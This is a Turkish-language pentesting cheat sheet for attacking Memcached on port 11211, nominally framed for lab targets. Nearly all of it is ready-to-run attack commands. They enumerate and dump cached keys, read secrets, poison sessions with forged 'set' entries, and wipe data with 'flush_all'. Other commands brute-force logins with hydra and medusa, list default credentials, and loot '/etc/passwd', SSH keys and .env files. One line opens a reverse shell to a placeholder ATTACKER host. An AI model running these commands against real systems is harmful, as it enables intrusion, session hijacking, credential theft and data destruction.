11211 - Pentesting Memcache
Memcached cache
Memcached çoğu kurulumda auth’suz dinler. stats/cachedump anahtarları açar; get secret, set oturum zehirler. Hedef lab IP’si üzerinde komutları 11211 portuna göre uyarla; her başarıyı ayrı kanıtla.
Metodoloji
Section titled “Metodoloji”-
11211 TCP doğrula.
-
stats ve items ile slab keşfet.
-
cachedump + get ile değer oku.
-
set ile session/token zehirle.
nmap -Pn -sV -p11211 TARGETnmap -p11211 --script memcached-info TARGETecho stats | nc TARGET 11211Komutlar
Section titled “Komutlar”echo -e 'stats items\nquit' | nc TARGET 11211echo -e 'stats cachedump 1 100\nquit' | nc TARGET 11211echo -e 'get KEY\nquit' | nc TARGET 11211printf 'set sess:1 0 0 5\r\nadmin\r\n' | nc TARGET 11211echo -e 'delete KEY\nquit' | nc TARGET 11211echo -e 'flush_all\nquit' | nc TARGET 11211memcdump --servers=TARGET | headPHPSESSID / JWT / DB URI anahtarlarıgrep -aE 'password|secret|BEGIN' dump.bin | headDerin enum
Section titled “Derin enum”Memcache için ek keşif ve fingerprint.
nmap -Pn -sV -sC -p11211 TARGETnmap -Pn -p11211 --script safe,discovery TARGETtimeout 5 bash -c 'echo | openssl s_client -connect TARGET:11211' 2>/dev/null | headpython3 -c "import socket;s=socket.create_connection(('TARGET',11211));s.settimeout(3);print(s.recv(4096))"Banner / TLS / ALPN notları → MemcacheKimlik & brute (ek)
Section titled “Kimlik & brute (ek)”hydra -L users.txt -P rockyou.txt -s 11211 PROTOCOL://TARGET -t 4medusa -h TARGET -U users.txt -P rockyou.txt -M PROTOCOL -n 11211nmap -p11211 --script '*-brute' TARGETadmin/admin, root/root, guest/(boş), test/testExploit arama
Section titled “Exploit arama”searchsploit Memcachedmsfconsole -q -x 'search Memcached; exit'nuclei -u https://TARGET:11211 -t cves/ -silent -severity || truenuclei -u http://TARGET:11211 -tags tech -silent || trueManuel protokol
Section titled “Manuel protokol”nc -nv TARGET 11211printf '' | timeout 3 nc -nv TARGET 11211curl -vk --http1.0 http://TARGET:11211/Wireshark/tcpdump ile konuşmayı kaydet; replay denePost-erişim & loot
Section titled “Post-erişim & loot”config, key, session, env, backupfind / -name '*.conf' -o -name '*.env' -o -name 'id_rsa' 2>/dev/null | headss -lntp; ip a; cat /etc/passwd | headbash -i >& /dev/tcp/ATTACKER/443 0>&1mkdir -p loot && tee loot/notes.txtOperasyon checklist
Section titled “Operasyon checklist”[ ] Fingerprint / sürüm[ ] Auth ve anonim erişim[ ] PoC etki gösterildi[ ] Credential/shell paketlendi[ ] Pivot notuZincir
Section titled “Zincir”stats → cachedump → get secrets → set session → app admin